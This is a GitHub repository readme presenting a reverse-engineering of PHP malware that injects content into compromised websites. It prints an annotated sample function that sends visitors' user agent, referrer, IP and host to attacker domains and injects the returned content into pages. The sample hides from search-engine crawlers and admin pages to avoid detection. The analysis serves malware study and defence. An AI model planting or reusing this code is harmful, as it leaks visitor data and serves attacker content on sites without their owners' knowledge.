No description, website, or topics provided.
Switch branches/tags
Nothing to show
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Failed to load latest commit information.
step-by-step
final.php
injected-code-examples.md
original.php
readme.md

readme.md

Reverse Engineering PHP Malware Content injection

This repository is a result of a Reverse Engineering of PHP Malware that makes Content injection.

The full description can be found in english in (@todo add link here) and in portuguese in (@todo add link here)

Authors of this work (re rev.eng., not the malware):

  • Bernardo Donadio bcdonadio at bcdonadio.com
  • Emerson Rocha Luiz emerson at alligo.com.br

Sample code

/** REVENGNOTE: Do not assume that this malware will have same function names.
 *              even for the same malware.
 */
function day212()
{
	$a = check212("HTTP_USER_AGENT");
	$b = check212("HTTP_REFERER");
	$c = check212("REMOTE_ADDR");
	$d = check212("HTTP_HOST");
	$e = check212("PHP_SELF");

	/** REVENGNOTE: this next array does nothing here. But was on original code.
	 *              33db9538.com, 9507c4e8.com, e5b57288.com and 54dfa1cb.com
	 *              are domains that point (now) for the same working server
	 *              they are used to create content to inject on user code
	 *
	 */
	$domarr = array(
		"33db9538",
		"9507c4e8",
		"e5b57288",
		"54dfa1cb"
	);

	/** REVENGNOTE: this is very important. It does NOT inject content on site
	 *              if is a search engine (that could alert site admin of this
	 *              malware, and also does not load on pages that are like
	 *              for administratior interfaces. It also check for a valid
     *              HTTP_REFERER, so sometimes, share a link with a friend will
     *              not work at all, because you need navitate on the site before
     *              Is very likely that most common antivirus agents will maybe
     *              pass this basic check, but remote server will know they
     *              user agent and will return empty content.
	 */
	if (($a == "non") or ($c == "non") or ($d == "non") or strrpos(strtolower($e) , "admin") or (preg_match("/" . implode("|", array(
		"google",
		"slurp",
		"msnbot",
		"ia_archiver",
		"yandex",
		"rambler"
	)) . "/i", strtolower($a)))) {
		$o1 = "";
	}
	else {
		$op = mt_rand(100000, 999999);
		$g4 = $op . "?" . urlencode(urlencode(k34($op, $a) . "." . k34($op, $b) . "." . k34($op, $c) . "." . k34($op, $d) . "." . k34($op, $e)));
		$url = "http://" . cqq(".com") . "/" . $g4;
		$ca1 = en2(@gtd($url) , $op);
		$a1 = @explode("!NF0", $ca1);
		if (sizeof($a1) >= 2) $o1 = $a1[1];
		else $o1 = "";
	}

	return $o1;
}

DISCLAIMER

This is a reverse-engineering of malicious code found in compromised servers. The use of this code without explicit consent of the owner of the infrastructure constitutes a felony in many countries. Do not use except for educational purposes.